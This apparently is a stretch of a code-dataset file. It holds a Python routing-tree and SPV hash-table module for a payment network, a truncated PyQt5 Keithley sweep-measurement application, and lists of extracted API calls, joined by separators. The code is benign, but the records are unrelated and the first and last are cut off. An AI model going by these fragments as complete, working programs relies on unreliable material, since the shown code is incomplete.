'([fit_leftx, fity])\n', (19309, 19328), True, 'import numpy as np\n'), ((16324, 16361), 'numpy.vstack', 'np.vstack', (['[fit_leftx + margin, fity]'], {}), '([fit_leftx + margin, fity])\n', (16333, 16361), True, 'import numpy as np\n'), ((16584, 16622), 'numpy.vstack', 'np.vstack', (['[fit_rightx + margin, fity]'], {}), '([fit_rightx + margin, fity])\n', (16593, 16622), True, 'import numpy as np\n'), ((19381, 19410), 'numpy.vstack', 'np.vstack', (['[fit_rightx, fity]'], {}), '([fit_rightx, fity])\n', (19390, 19410), True, 'import numpy as np\n')] |
"""Author: Trinity Core Team
MIT License
Copyright (c) 2018 Trinity
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import json
import copy
from treelib import Node, Tree
from treelib.exceptions import DuplicatedNodeIdError
import re
def parse_uri(uri):
# fixed url format: publicKey@IP:PORT
if isinstance(uri, str):
return re.split('[@:]', uri)
return None
class RouteTree(Tree):
"""
# Node(tag, nid, data)
# tag: readable noe name for human to
# nid: unique id in scope three
"""
def __init__(self):
super().__init__()
# record the route path
self.route_path = []
def create(self,tag, identifier, data):
self.create_node(tag=tag, identifier=identifier, data=data)
self.root = identifier
def find_router(self, identifier, policy=None):
"""
:param identifier: use the url as the identifier
:param policy: not used currently
:return:
"""
self.route_path = [nid for nid in self.rsearch(identifier)][::-1]
return self.route_path
@property
def next_jump(self):
try:
return self.route_path[self.route_path.index(self.root)+1]
except Exception:
return None
@classmethod
def to_tree(cls, tr_json):
tree = cls()
for item in json.loads(tr_json):
tree.expand_branch(tr_json = tr_json)
return tree
def expand_branch(self, tr_json, father= None):
tr = json.loads(tr_json)
tag = list(tr.keys())[0]
nid = tr[tag]["data"]["Ip"]
try:
self.create_node(tag=tag, identifier=nid, parent=father, data=tr[tag]["data"])
except DuplicatedNodeIdError:
pass
# print(tr.values())
child = list(tr.values())[0].get("children")
# print(child)
if child:
for item in child:
self.expand_branch(json.dumps(item), father=nid)
else:
pass
def sync_tree(self, peer_tree):
"""
get all peers node id\n
traversal all peers \n
deep copy current tree get the new_tree\n
make child as the new_tree root\n
:param peer_tree:
:return:
"""
copy_peer_tree = copy.deepcopy(peer_tree)
# if contains each other
for self_nid in self.nodes.keys():
if copy_peer_tree.contains(self_nid) and self_nid != peer_tree.root:
copy_peer_tree.remove_node(self_nid)
if self.contains(peer_tree.root):
self.remove_node(peer_tree.root)
# print(peer_tree.to_dict(with_data=True))
self.paste(self.root, copy_peer_tree)
class WalletSet(object):
def __init__(self, **kwargs):
self.address = None
self.ip = None
self.port = None
self.public_key = None
self.deposit = None
self.fee = 0
self.__dict__.update(kwargs)
class SPVHashTable(object):
"""
Description: use the dictionary to hash the spv table with wallet node address
"""
hash_instance = None
def __init__(self):
self.__maps = {}
pass
def __new__(cls, *args, **kwargs):
if not cls.hash_instance:
cls.hash_instance = object.__new__(cls, *args, **kwargs)
return cls.hash_instance
@property
def maps(self):
return self.__maps
def find_keys(self, spv_key):
"""
:param spv_key: The public key string of the spv\n
:return: list type. [wallet-1-public-key , wallet-2-public-key, ...]
"""
keys = []
for key in self.maps:
if spv_key in self.find(key):
keys.append(key)
return keys
def find(self, key):
"""
:param key: The public key string of the wallet\n
:return: list type. [spv-1-public-key , spv-2-public-key, ...]
"""
return self.maps.get(key)
def add(self, key, value):
"""
:param key: The public key string of the wallet
:param value: the public key of the spv
:return:
"""
if key not in self.maps.keys():
self.maps.update({key:[value]})
else:
self.maps[key].append(value)
# elif value not in self.maps.get(key):
# self.maps[key].append(value)
def remove(self, key, value):
"""
:param key: The public key string of the wallet
:param value: the public key of the spv
:return:
"""
if key in self.maps.keys():
spv_list = self.maps[key]
if value in spv_list:
spv_list.remove(value)
def sync_table(self, hash_table):
"""
:param hash_table: json or dict type
:return:
"""
if isinstance(hash_table, str):
# decoder
hash_table = self.to_dict(hash_table)
if not hash_table:
return
for key in hash_table:
if key in self.maps:
self.maps[key].extend(hash_table[key])
self.maps[key] = list(set(self.maps[key]))
else:
self.maps[key] = hash_table[key]
def to_json(self):
return json.dumps(self.maps)
@staticmethod
def to_dict(s):
return json.loads(s)
| [
"re.split",
"json.loads",
"json.dumps",
"copy.deepcopy"
] | [((1359, 1380), 're.split', 're.split', (['"""[@:]"""', 'uri'], {}), "('[@:]', uri)\n", (1367, 1380), False, 'import re\n'), ((2413, 2432), 'json.loads', 'json.loads', (['tr_json'], {}), '(tr_json)\n', (2423, 2432), False, 'import json\n'), ((2577, 2596), 'json.loads', 'json.loads', (['tr_json'], {}), '(tr_json)\n', (2587, 2596), False, 'import json\n'), ((3384, 3408), 'copy.deepcopy', 'copy.deepcopy', (['peer_tree'], {}), '(peer_tree)\n', (3397, 3408), False, 'import copy\n'), ((6519, 6540), 'json.dumps', 'json.dumps', (['self.maps'], {}), '(self.maps)\n', (6529, 6540), False, 'import json\n'), ((6599, 6612), 'json.loads', 'json.loads', (['s'], {}), '(s)\n', (6609, 6612), False, 'import json\n'), ((3026, 3042), 'json.dumps', 'json.dumps', (['item'], {}), '(item)\n', (3036, 3042), False, 'import json\n')] |
# ---------------------------------------------------------------------------------
# QKeithleySweep -> QVisaApplication
# Copyright (C) 2019 <NAME>
# github: https://github.com/mesoic
# email: <EMAIL>
# ---------------------------------------------------------------------------------
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#!/usr/bin/env python
import os
import sys
import time
import threading
# Import numpy
import numpy as np
# Import QVisaApplication
from PyQtVisa import QVisaApplication
# Import PyQtVisa widgets
from PyQtVisa.widgets import QVisaUnitSelector
from PyQtVisa.widgets import QVisaDynamicPlot
# Import QT backends
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtCore import Qt, QStateMachine, QState, QObject
from PyQt5.QtGui import QIcon
# Container class to construct sweep measurement widget
class QKeithleySweep(QVisaApplication.QVisaApplication):
def __init__(self, _config):
# Inherits QVisaApplication -> QWidget
super(QKeithleySweep, self).__init__(_config)
# Generate Main Layout
self.gen_main_layout()
#####################################
# APPLICATION HELPER METHODS
#
# Wrapper method to get keitley write handle
# Returns the pyVisaDevice object
def keithley(self, __widget__):
return self.get_device_by_name( __widget__.currentText() )
# Method to refresh the widget
def refresh(self):
# If add insturments have been initialized
if self.get_devices() is not None:
# Reset the widget and add insturments
self.sweep_inst.refresh( self )
self.step_inst.refresh( self )
# Plot control widgets
self.plot_x_inst.refresh( self )
self.plot_y_inst.refresh( self )
# Update sweep parameters and enable output button
self.meas_button.setEnabled(True)
self.update_meas_params()
else:
# Disable output button
self.meas_button.setEnabled(False)
# Method to set sweep parameters
def set_sweep_params(self, start, stop, npts):
# No hysteresis
if self.sweep_hist.currentText() == "None":
sp = np.linspace(float(start), float(stop), int(npts) )
self._set_app_metadata("__sweep__", sp)
# Prepare reverse sweep
if self.sweep_hist.currentText() == "Reverse-sweep":
# Sweep centered hysteresis
sp = np.linspace(float(start), float(stop), int(npts) )
sp = np.concatenate( (sp, sp[-2::-1]) )
self._set_app_metadata("__sweep__", sp)
# Prepare a zero centered hysteresis
if self.sweep_hist.currentText() == "Zero-centered":
# Create a linspace
sp = np.linspace(float(start), float(stop), int(npts) )
# Extract positive slice
pos = np.where(sp > 0, sp, np.nan)
pos = pos[~np.isnan(pos)]
# Extract negative slice
neg = np.where(sp < 0, sp, np.nan)
neg = neg[~np.isnan(neg)]
# Create the zero centered hysteresis re-insert zeros
# Forward sweep, zero crossing
if (start < 0.) and (stop > 0.) and (start < stop):
sp = np.concatenate( ([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1::], [0.0]) )
# Reverse sweep, zero crossing
elif (start > 0.) and (stop < 0.) and (start > stop):
sp = np.concatenate( ([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1::], [0.0]) )
print(sp)
# If not zero crossing, default to "Reverse-sweep" case
else:
sp = np.concatenate( (sp, sp[-2::-1]) )
# Set meta field
self._set_app_metadata( "__sweep__", sp)
# Method to set step parameters
def set_step_params(self, start, stop, npts):
# No hysteresis
sp = np.linspace(float(start), float(stop), int(npts) )
self._set_app_metadata("__step__", sp)
#####################################
# MAIN LAYOUT
#
def gen_main_layout(self):
# Create Icon for QMessageBox
self._set_icon( QIcon(os.path.join(os.path.dirname(os.path.realpath(__file__)), "python.ico")))
# Create layout objects and set layout
self.layout = QHBoxLayout()
self.layout.addWidget(self.gen_main_ctrl(), 1)
self.layout.addWidget(self.gen_main_plot(), 3)
self.setLayout(self.layout)
#####################################
# MAIN LAYOUT
#
# Main controls:
# a) Measure button and state machine
# b) V-Step mode on/off state machine
# c) IV-sweep and V-step configure pages
# d) Save button
def gen_main_ctrl(self):
# Main control widget
self.meas_ctrl = QWidget()
self.meas_ctrl_layout = QVBoxLayout()
#####################################
# MEASURE STATE MACHINE AND BUTTON
#
# Measurement Button. This will be a state machine which
# alternates between 'measure' and 'abort' states
self.meas_state = QStateMachine()
self.meas_button = QPushButton()
self.meas_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
# Create measurement states
self.meas_run = QState()
self.meas_stop = QState()
# Assign state properties and transitions
self.meas_run.assignProperty(self.meas_button, 'text', 'Abort Sweep')
self.meas_run.addTransition(self.meas_button.clicked, self.meas_stop)
self.meas_run.entered.connect(self.exec_meas_run)
self.meas_stop.assignProperty(self.meas_button, 'text', 'Measure Sweep')
self.meas_stop.addTransition(self.meas_button.clicked, self.meas_run)
self.meas_stop.entered.connect(self.exec_meas_stop)
# Add states, set initial state, and state machine
self.meas_state.addState(self.meas_run)
self.meas_state.addState(self.meas_stop)
self.meas_state.setInitialState(self.meas_stop)
self.meas_state.start()
# Meas pages
self.meas_pages = QStackedWidget()
self.meas_pages.addWidget(self.gen_sweep_ctrl())
self.meas_pages.addWidget(self.gen_step_ctrl())
self.meas_pages.addWidget(self.gen_plot_ctrl())
# Meta widget for trace description
self.meta_widget_label = QLabel("<b>Trace Description</b>")
self.meta_widget = self._gen_meta_widget()
self.meta_widget.set_meta_subkey("__desc__")
# Save widget
self.save_widget = self._gen_save_widget()
# Pack widgets into layout
self.meas_ctrl_layout.addWidget(self.meas_button)
self.meas_ctrl_layout.addWidget(self.gen_config_ctrl())
self.meas_ctrl_layout.addWidget(self.meas_pages)
# Add save widget
self.meas_ctrl_layout.addStretch(1)
self.meas_ctrl_layout.addWidget(self.meta_widget_label)
self.meas_ctrl_layout.addWidget(self.meta_widget)
self.meas_ctrl_layout.addWidget(self.save_widget)
# Set layout and return widget reference
self.meas_ctrl.setLayout(self.meas_ctrl_layout)
return self.meas_ctrl
#####################################
# CONFIGURE WIDGET
#
def gen_config_ctrl(self):
self.meas_config = QWidget()
self.meas_config_layout = QVBoxLayout()
# Current/Voltage Sweep Mode
self.meas_config_page_label = QLabel("<b>Configure Parameters</b>")
self.meas_config_page = QComboBox()
self.meas_config_page.setFixedWidth(200)
self.meas_config_page.addItems(["IV-sweep", "IV-step", "IV-plot"])
self.meas_config_page.currentTextChanged.connect(self.update_config_page)
# Add some space for layout clarity
self.meas_config_layout.setContentsMargins(0,10,0,10)
self.meas_config_layout.addWidget(self._gen_vbox_widget([self.meas_config_page_label, self.meas_config_page]))
# Pack config layout and return reference
self.meas_config.setLayout(self.meas_config_layout)
return self.meas_config
# Sweep control layout
def gen_sweep_ctrl(self):
self.sweep_ctrl = QWidget()
self.sweep_ctrl_layout = QVBoxLayout()
# Main control label
self.sweep_ctrl_label = QLabel("<b>IV-sweep Parameters</b>")
#####################################
# SWEEP INST SELECT
#
# Insturement selector and save widget
self.sweep_inst_label = QLabel("Select Device")
self.sweep_inst = self._gen_device_select()
self.sweep_inst.setFixedWidth(200)
#####################################
# SWEEP MEASUREMENT CONFIGURATION
#
# Current/Voltage Sweep Mode
self.sweep_src_label = QLabel("Sweep Type")
self.sweep_src = QComboBox()
self.sweep_src.setFixedWidth(200)
self.sweep_src.addItems(["Voltage", "Current"])
self.sweep_src.currentTextChanged.connect(self.update_sweep_ctrl)
# Generate voltage and current source widgets
self.gen_voltage_sweep() # self.voltage_sweep
self.gen_current_sweep() # self.current_sweep
# Add to stacked widget
self.sweep_pages = QStackedWidget()
self.sweep_pages.addWidget(self.voltage_sweep)
self.sweep_pages.addWidget(self.current_sweep)
self.sweep_pages.setCurrentIndex(0)
# Hysteresis mode
self.sweep_hist_label = QLabel("Hysteresis Mode")
self.sweep_hist = QComboBox()
self.sweep_hist.setFixedWidth(200)
self.sweep_hist.addItems(["None", "Reverse-sweep", "Zero-centered"])
#####################################
# ADD CONTROLS
#
# Sweep configuration controls
self.sweep_ctrl_layout.addWidget(self.sweep_ctrl_label)
self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_inst,self.sweep_inst_label]))
self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_src, self.sweep_src_label]))
self.sweep_ctrl_layout.addWidget(self._gen_hbox_widget([self.sweep_hist, self.sweep_hist_label]))
self.sweep_ctrl_layout.addWidget(self.sweep_pages)
# Positioning
self.sweep_ctrl.setLayout(self.sweep_ctrl_layout)
return self.sweep_ctrl
# Step control layout
def gen_step_ctrl(self):
self.step_ctrl = QWidget()
self.step_ctrl_layout = QVBoxLayout()
# Step control label
self.step_ctrl_label = QLabel("<b>V-step Parameters</b>")
# Voltage step instruement selector
self.step_inst_label = QLabel("Select Device")
self.step_inst = self._gen_device_select()
self.step_inst.setFixedWidth(200)
# Step control mode selector
self.step_src_label = QLabel("Step Type")
self.step_src = QComboBox()
self.step_src.setFixedWidth(200)
self.step_src.addItems(["Voltage", "Current"])
self.step_src.currentTextChanged.connect(self.update_step_ctrl)
# Generate voltage and current source widgets
self.gen_voltage_step() # self.voltage_step
self.gen_current_step() # self.current_step
# Add step modes to step_pages widget
self.step_pages = QStackedWidget()
self.step_pages.addWidget(self.voltage_step)
self.step_pages.addWidget(self.current_step)
self.step_pages.setCurrentIndex(0)
# Step control state machine
self.step_state = QStateMachine()
self.step_button = QPushButton()
self.step_button.setStyleSheet(
"background-color: #dddddd; border-style: solid; border-width: 1px; border-color: #aaaaaa; padding: 7px;" )
# Create measurement states
self.step_on = QState()
self.step_off = QState()
# Assign state properties and transitions
self.step_on.assignProperty(self.step_button, 'text', 'Step Bias ON')
self.step_on.addTransition(self.step_button.clicked, self.step_off)
self.step_on.entered.connect(self.exec_step_on)
self.step_off.assignProperty(self.step_button, 'text', 'Step Bias OFF')
self.step_off.addTransition(self.step_button.clicked, self.step_on)
self.step_off.entered.connect(self.exec_step_off)
# Add states, set initial state, and state machine
self.step_state.addState(self.step_on)
self.step_state.addState(self.step_off)
self.step_state.setInitialState(self.step_off)
self.step_state.start()
# Pack widgets
self.step_ctrl_layout.addWidget(self.step_ctrl_label)
self.step_ctrl_layout.addWidget(self._gen_hbox_widget([self.step_inst,self.step_inst_label]))
self.step_ctrl_layout.addWidget(self._gen_hbox_widget([self.step_src, self.step_src_label]))
self.step_ctrl_layout.addWidget(self.step_pages)
self.step_ctrl_layout.addWidget(self.step_button)
self.step_ctrl_layout.addStretch(1)
# Set layout and return reference
self.step_ctrl.setLayout(self.step_ctrl_layout)
return self.step_ctrl
# Plot control layout
def gen_plot_ctrl(self):
self.plot_ctrl = QWidget()
self.plot_ctrl_layout = QVBoxLayout()
# Voltage step instruement selector
self.plot_x_inst_label = QLabel("<b>Configure x-axis</b>")
self.plot_x_inst = self._gen_device_select()
self.plot_x_inst.setFixedWidth(200)
self.plot_x_inst.set_callback("update_plot_ctrl")
self.plot_x_data = QComboBox()
self.plot_x_data.setFixedWidth(100)
self.plot_x_data.addItems(["Voltage", "Current"])
self.plot_x_data.currentTextChanged.connect( self.update_plot_ctrl )
# Voltage step instruement selector
self.plot_y_inst_label = QLabel("<b>Configure y-axis</b>")
self.plot_y_inst = self._gen_device_select()
self.plot_y_inst.setFixedWidth(200)
self.plot_y_inst.set_callback("update_plot_ctrl")
self.plot_y_data = QComboBox()
self.plot_y_data.setFixedWidth(100)
self.plot_y_data.addItems(["Voltage", "Current"])
self.plot_y_data.setCurrentIndex(1)
self.plot_y_data.currentTextChanged.connect( self.update_plot_ctrl )
# Add widgets
self.plot_ctrl_layout.addWidget( self.plot_x_inst_label )
self.plot_ctrl_layout.addWidget( self._gen_hbox_widget( [self.plot_x_inst,self.plot_x_data]) )
self.plot_ctrl_layout.addWidget( self.plot_y_inst_label )
self.plot_ctrl_layout.addWidget( self._gen_hbox_widget( [self.plot_y_inst,self.plot_y_data]) )
self.plot_ctrl_layout.addStretch(1)
# Set layout and return reference
self.plot_ctrl.setLayout(self.plot_ctrl_layout)
return self.plot_ctrl
# Generate voltage sweep widget
def gen_voltage_sweep(self):
# New QWidget
self.voltage_sweep = QWidget()
self.voltage_sweep_layout = QVBoxLayout()
# Sweep Start
self.voltage_sweep_start_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Sweep Start (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [0.00, ""]
}
self.voltage_sweep_start = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_start_config)
# Sweep Stop
self.voltage_sweep_stop_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Sweep Stop (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.voltage_sweep_stop = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_stop_config)
# Compliance Spinbox
self.voltage_sweep_cmpl_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Compliance (A)",
"signed" : False,
"limit" : [1.0, "" ],
"default" : [150, "m"]
}
self.voltage_sweep_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_cmpl_config)
# Number of points
self.voltage_sweep_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [512],
"default" : [51]
}
self.voltage_sweep_npts = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_npts_config)
# Measurement Delay
self.voltage_sweep_delay_config={
"unit" : "__DOUBLE__",
"label" : "Measurement Interval (s)",
"signed" : False,
"limit" : [60.0],
"default" : [0.10]
}
self.voltage_sweep_delay = QVisaUnitSelector.QVisaUnitSelector(self.voltage_sweep_delay_config)
# Pack selectors into layout
self.voltage_sweep_layout.addWidget(self.voltage_sweep_start)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_stop)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_cmpl)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_npts)
self.voltage_sweep_layout.addWidget(self.voltage_sweep_delay)
self.voltage_sweep_layout.setContentsMargins(0,0,0,0)
# Set layout
self.voltage_sweep.setLayout(self.voltage_sweep_layout)
# Generate current sweep widget
def gen_current_sweep(self):
# New QWidget
self.current_sweep = QWidget()
self.current_sweep_layout = QVBoxLayout()
# Sweep Start
self.current_sweep_start_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Sweep Start (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [0.0, "m"]
}
self.current_sweep_start = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_start_config)
# Sweep Stop
self.current_sweep_stop_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Sweep Stop (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [100, "m"]
}
self.current_sweep_stop = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_stop_config)
# Compliance Spinbox
self.current_sweep_cmpl_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Compliance (V)",
"signed" : False,
"limit" : [20., ""],
"default" : [1.0, ""]
}
self.current_sweep_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_cmpl_config)
# Number of points
self.current_sweep_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [11]
}
self.current_sweep_npts = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_npts_config)
# Measurement Delay
self.current_sweep_delay_config={
"unit" : "__DOUBLE__",
"label" : "Measurement Interval (s)",
"signed" : False,
"limit" : [60.0],
"default" : [0.1]
}
self.current_sweep_delay = QVisaUnitSelector.QVisaUnitSelector(self.current_sweep_delay_config)
# Pack selectors into layout
self.current_sweep_layout.addWidget(self.current_sweep_start)
self.current_sweep_layout.addWidget(self.current_sweep_stop)
self.current_sweep_layout.addWidget(self.current_sweep_cmpl)
self.current_sweep_layout.addWidget(self.current_sweep_npts)
self.current_sweep_layout.addWidget(self.current_sweep_delay)
self.current_sweep_layout.setContentsMargins(0,0,0,0)
# Set layout
self.current_sweep.setLayout(self.current_sweep_layout)
# Generate voltage step widget
def gen_voltage_step(self):
# New QWidget
self.voltage_step= QWidget()
self.voltage_step_layout = QVBoxLayout()
# Step Start
self.voltage_step_start_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Step Start (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [0.00, ""]
}
self.voltage_step_start = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_start_config)
# Step Stop
self.voltage_step_stop_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Step Stop (V)",
"signed" : True,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.voltage_step_stop = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_stop_config)
# Step Compliance Spinbox
self.voltage_step_cmpl_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Compliance (A)",
"signed" : False,
"limit" : [1.0, "" ],
"default" : [150, "m"]
}
self.voltage_step_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_cmpl_config)
# Step Number of points
self.voltage_step_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [5]
}
self.voltage_step_npts = QVisaUnitSelector.QVisaUnitSelector(self.voltage_step_npts_config)
# Pack selectors into layout
self.voltage_step_layout.addWidget(self.voltage_step_start)
self.voltage_step_layout.addWidget(self.voltage_step_stop)
self.voltage_step_layout.addWidget(self.voltage_step_cmpl)
self.voltage_step_layout.addWidget(self.voltage_step_npts)
self.voltage_step_layout.setContentsMargins(0,0,0,0)
# Set layout
self.voltage_step.setLayout(self.voltage_step_layout)
# Generate current step widget
def gen_current_step(self):
# New QWidget
self.current_step = QWidget()
self.current_step_layout = QVBoxLayout()
# Step Start
self.current_step_start_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Step Start (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [0.0, "m"]
}
self.current_step_start = QVisaUnitSelector.QVisaUnitSelector(self.current_step_start_config)
# Step Stop
self.current_step_stop_config={
"unit" : "A",
"min" : "u",
"max" : "",
"label" : "Step Stop (A)",
"signed" : True,
"limit" : [1.0, "" ],
"default" : [1.0, "m"]
}
self.current_step_stop = QVisaUnitSelector.QVisaUnitSelector(self.current_step_stop_config)
# Step Compliance Spinbox
self.current_step_cmpl_config={
"unit" : "V",
"min" : "u",
"max" : "",
"label" : "Compliance (V)",
"signed" : False,
"limit" : [20.0, ""],
"default" : [1.00, ""]
}
self.current_step_cmpl = QVisaUnitSelector.QVisaUnitSelector(self.current_step_cmpl_config)
# Step Number of points
self.current_step_npts_config={
"unit" : "__INT__",
"label" : "Number of Points",
"signed" : False,
"limit" : [256],
"default" : [5]
}
self.current_step_npts = QVisaUnitSelector.QVisaUnitSelector(self.current_step_npts_config)
# Pack selectors into layout
self.current_step_layout.addWidget(self.current_step_start)
self.current_step_layout.addWidget(self.current_step_stop)
self.current_step_layout.addWidget(self.current_step_cmpl)
self.current_step_layout.addWidget(self.current_step_npts)
self.current_step_layout.addStretch(1)
self.current_step_layout.setContentsMargins(0,0,0,0)
# Set layout
self.current_step.setLayout(self.current_step_layout)
# Ádd dynamic plot
def gen_main_plot(self):
# Create QVisaDynamicPlot object (inherits QWidget)
self.plot = QVisaDynamicPlot.QVisaDynamicPlot(self)
self.plot.add_subplot(111)
self.plot.add_origin_lines("111", "both")
self.plot.set_axes_labels("111", "Voltage (V)", "Current (A)")
# Refresh canvas
self.plot.refresh_canvas(supress_warning=True)
# Sync plot clear data button with application data
self.plot.sync_application_data(True)
# Sync meta widget when clearing data
self.plot.set_mpl_refresh_callback("_sync_meta_widget_to_data_object")
# Return the plot
return self.plot
# Sync meta widget
def _sync_meta_widget_to_data_object(self):
# Application keys
_data_keys = self._get_data_object().keys()
_widget_keys = self.meta_widget.get_meta_keys()
# Check if widget keys are not in data keys
for _key in _widget_keys:
# If not then delete the key from meta_widget
if _key not in _data_keys:
self.meta_widget.del_meta_key(_key)
#####################################
# UPDATE CONFIG PAGE
#
def update_config_page(self):
if self.meas_config_page.currentText() == "IV-sweep":
self.meas_pages.setCurrentIndex(0)
if self.meas_config_page.currentText() == "IV-step":
self.meas_pages.setCurrentIndex(1)
if self.meas_config_page.currentText() == "IV-plot":
self.meas_pages.setCurrentIndex(2)
#####################################
# SWEEP CONTROL UPDATE METHODS
#
# Sweep control dynamic update
def update_sweep_ctrl(self):
# Switch to voltage sweep page
if self.sweep_src.currentText() == "Voltage":
self.sweep_pages.setCurrentIndex(0)
self.update_meas_params()
# Switch to current sweep page
if self.sweep_src.currentText() == "Current":
self.sweep_pages.setCurrentIndex(1)
self.update_meas_params()
# Sweep control dynamic update
def update_step_ctrl(self):
# Switch to voltage sweep page
if self.step_src.currentText() == "Voltage":
self.step_pages.setCurrentIndex(0)
self.update_meas_params()
# Switch to current sweep page
if self.step_src.currentText() == "Current":
self.step_pages.setCurrentIndex(1)
self.update_meas_params()
# Update plot axes when we change configuration
def update_plot_ctrl(self):
# Extract correct unit labels
x_unit = "(V)" if self.plot_x_data.currentText() == "Voltage" else "(A)"
y_unit = "(V)" if self.plot_y_data.currentText() == "Voltage" else "(A)"
# Update axes
self.plot.set_axes_labels("111",
"%s %s : %s"%(self.plot_x_data.currentText(), x_unit ,self.plot_x_inst.currentText()),
"%s %s : %s"%(self.plot_y_data.currentText(), y_unit ,self.plot_y_inst.currentText())
)
self.plot.update_canvas()
# Create Measurement
def update_meas_params(self):
# Set up v-source(i-compliance) on keithley
if self.sweep_src.currentText() == "Voltage":
# Set sweeep paramaters
self.set_sweep_params(
self.voltage_sweep_start.value(),
self.voltage_sweep_stop.value(),
self.voltage_sweep_npts.value())
# Set keithley as voltage source
if self.keithley(self.sweep_inst) is not None:
self.keithley(self.sweep_inst).voltage_src()
self.keithley(self.sweep_inst).set_voltage(0.0)
self.keithley(self.sweep_inst).current_cmp(self.voltage_sweep_cmpl.value())
# Set up i-source(v-compliance) on keithley
if self.sweep_src.currentText() == "Current":
# Set sweeep paramaters
self.set_sweep_params(
self.current_sweep_start.value(),
self.current_sweep_stop.value(),
self.current_sweep_npts.value())
# Set keithley as voltage source
if self.keithley(self.sweep_inst) is not None:
self.keithley(self.sweep_inst).current_src()
self.keithley(self.sweep_inst).set_current(0.0)
self.keithley(self.sweep_inst).voltage_cmp(self.current_sweep_cmpl.value())
# Set step keithley as voltage source. Also ensure that we are not initializing
# the the sweep keithely with step params if doubly selected.
if ( ( self.keithley(self.step_inst) is not None) and
(self.keithley(self.step_inst) != self.keithley(self.sweep_inst) ) ):
# Set up v-source(i-compliance) on keithley
if self.step_src.currentText() == "Voltage":
# Set sweeep paramaters
self.set_step_params(
self.voltage_step_start.value(),
self.voltage_step_stop.value(),
self.voltage_step_npts.value())
# Set keithley as voltage source
if self.keithley(self.step_inst) is not None:
self.keithley(self.step_inst).voltage_src()
self.keithley(self.step_inst).set_voltage(0.0)
self.keithley(self.step_inst).current_cmp(self.voltage_step_cmpl.value())
# Set up i-source(v-compliance) on keithley
if self.step_src.currentText() == "Current":
